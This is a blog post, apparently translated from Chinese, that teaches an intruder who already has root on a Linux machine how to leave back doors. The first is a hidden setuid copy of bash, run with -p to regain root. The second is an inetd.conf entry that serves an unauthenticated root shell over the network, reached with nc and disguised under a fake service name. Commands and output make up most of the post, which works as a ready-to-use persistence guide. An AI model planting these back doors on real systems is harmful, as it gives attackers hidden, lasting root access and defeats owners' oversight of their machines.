IMCAFS

 Home

two postures of linux back door (suid shell and inetd back door)

Posted by lipsius at 2020-03-03
all

Premise: you are root now. You want to leave a back door so that you can explode the chrysanthemum again in the future.

System environment:

dawg:~# uname -a

Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

1. SUID shell

For the knowledge of the suid bit, first, switch to root and execute the following command:

dawg:~# cp /bin/bash /.woot

dawg:~# chmod 4755 /.woot

dawg:~# ls -al /.woot

-rwsr-xr-x 1 root root 690668 Jul 24 17:14 /.woot

Of course, you can also have other more hidden names. I think you are lewd and witty, and you will surely come up with many good names. The point in front of the file is not necessary, just to hide the file (add "." at the top of the file name, you can hide it in any file directory)

Now, as a normal user, let's enable the backdoor:

[email protected]:~$ id

uid=1000(fw) gid=1000(fw) groups=1000(fw)

[email protected]:~$ /.woot

.woot-2.05b$ id

uid=1000(fw) gid=1000(fw) groups=1000(fw)

.woot-2.05b$

Falk! Why not?

Because Bash2 has some protective measures for suid, but this is not unbreakable:

.woot-2.05b$ /.woot -p

.woot-2.05b# id

uid=1000(fw) gid=1000(fw) euid=0(root) groups=1000(fw)

Use the - P parameter to get a root shell. This euid means effective user ID (for the knowledge of these IDS, you can stamp here)

In particular, when executing the suid shell as an ordinary user, you must use the full path.

Little knowledge: how to find files with suid:

dawg:~# find / -perm +4000 -ls

The file with the suid bit will be returned.

2. Remote back door: Use / etc / inetd.conf

We use VI to modify the / etc / inetd.conf file

Original document:

#chargen dgram udp wait root internal

#discard stream tcp nowait root internal

#discard dgram udp wait root internal

#daytime stream tcp nowait root internal

Revised to:

#discard stream tcp nowait root internal

#discard dgram udp wait root internal

daytime stream tcp nowait root /bin/bash bash -i

Enable inetd:

To force a restart of inetd:

dawg:~# ps -ef | grep inetd

root 362 1 0 Jul22 ? 00:00:00 /usr/sbin/inetd

root 13769 13643 0 17:51 pts/1 00:00:00 grep inetd

dawg:~# kill -HUP 362

Now we can use NC to explode chrysanthemum:

C:tools<nc -vv 192.168.1.77 13

192.168.1.77: inverse host lookup failed: h_errno 11004: NO_DATA

(UNKNOWN) [192.168.1.77] 13 (daytime) open

bash: no job control in this shell

bash-2.05b# bash-2.05b#

bash-2.05b# id

uid=0(root) gid=0(root) groups=0(root)

bash-2.05b# uname -a

Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

Tips:

Let's take the cheaper one:

We can modify the / etc / services file and add the following:

woot 6666/tcp  #evil backdoor service

Then modify / etc / inetd.conf:

woot stream tcp nowait root /bin/bash bash -i

We can modify it to some common ports to hide.

Editor's speech: in fact, under the / etc / shadow file, the password of root is the most secure!

[via @ sy64 Peng / network security research team]

© 2023